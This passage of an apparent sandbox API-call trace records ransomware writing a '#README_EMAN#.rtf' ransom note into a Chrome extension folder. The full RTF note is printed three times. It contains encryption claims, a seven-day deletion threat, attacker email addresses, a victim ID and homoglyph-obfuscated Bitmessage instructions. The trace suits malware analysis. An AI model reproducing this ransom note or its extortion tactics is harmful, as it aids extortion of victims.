data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\#readme_eman#.rtf")) returned 0xffffffff [0278.224] GetLastError () returned 0x2 [0278.224] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.225] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.225] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.225] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 